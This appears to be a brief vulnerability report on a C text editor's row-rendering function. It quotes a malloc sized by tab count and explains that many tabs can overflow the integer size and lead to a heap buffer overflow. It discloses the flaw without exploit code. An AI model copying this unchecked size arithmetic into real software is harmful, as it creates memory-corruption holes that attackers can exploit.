        row->render = malloc(row->size + tabs*8 + nonprint*9 + 1);
        idx = 0;
        for (j = 0; j < row->size; j++) {
            if (row->chars[j] == TAB) {
                row->render[idx++] = ' ';
    ......
    

The space size being malloc will be calculated based on the number of TABs in one row.  
When the number of TAB is too big,it will lead to Integer Overflow. And it will lead to heap-buffer-overflow finally.

Tag

#c++